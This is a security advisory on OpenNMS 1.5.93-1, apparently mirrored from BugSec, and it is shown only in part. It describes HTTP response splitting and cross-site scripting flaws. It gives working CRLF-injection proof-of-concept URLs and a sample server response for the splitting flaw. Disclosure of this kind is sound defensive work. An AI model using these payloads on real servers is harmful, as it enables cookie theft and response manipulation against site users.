AOH :: HP Unsorted O :: VA1490.HTM

OpenNMS Multiple Vulnerabilities



OpenNMS Multiple Vulnerabilities
OpenNMS Multiple Vulnerabilities



OpenNMS Multiple Vulnerabilities

BugSec | Security Advisory
Moshe Ben-Abu | Security Expert

Advisory URL (PDF):
http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf 
 

-     Table of Contents -

OPENNMS MULTIPLE VULNERABILITIES        1
Vendor                        3
Application Description                3
OpenNMS HTTP Response Splitting Vulnerability    3
Vulnerability Information            3
Vulnerability Details                3
Proof-of-Concept                4
OpenNMS Cross-Site Scripting Vulnerabilities    5
Vulnerability Information            5
Vulnerability Details                5
Proof-of-Concept                5
Security Analysis                6
Discovery                    6
Disclosure Timeline                6
About BugSec LTD.                6
References                    6


 
Vendor
OpenNMS Group =E2=80=93 http://www.opennms.com 
OpenNMS Project =E2=80=93 http://www.opennms.org 

Application Description
=E2=80=9COpenNMS is the world's first enterprise grade network management
platform developed under the open source model. It
consists of a community supported open-source project as well as a
commercial services, training, and support
organization. - From OpenNMS Project website.


OpenNMS HTTP Response Splitting Vulnerability
Vulnerability Information
Remotely exploitable: Yes
Locally exploitable: No
Affected versions:
OpenNMS 1.5.93-1
Other versions may also be affected.

Vulnerability Details
An input validation problem exists within OpenNMS which allows injecting
CR (carriage return - %0D or \r) and LF
(line feed - %0A or \n) characters into the server HTTP response header,
resulting in a HTTP Response Splitting[1]
vulnerability.
This vulnerability is possible because the application fails to validate
user supplied input, returning it
un-sanitized within the server HTTP response header back to the client.
This vulnerability not only gives attackers control of the remaining
headers and body of the server response, but
also allows them to create additional responses entirely under their
control.
Attacker-supplied HTML or JavaScript code could run in the context of
the affected site, potentially allowing an
attacker to steal cookie-based authentication credentials, control how
the site is rendered to the user, and
influence or misrepresent how web content is served, cached, or
interpreted. Other attacks are also possible.






Proof-of-Concept

Header injection
http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec 

Server response
HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:30:05 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list? 
InjectedHeader: BugSecContent-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


HTTP Response Splitting
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text 
/html%0D%0AContent-Length:%2036%0D%0A%0D%0ABugSec

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.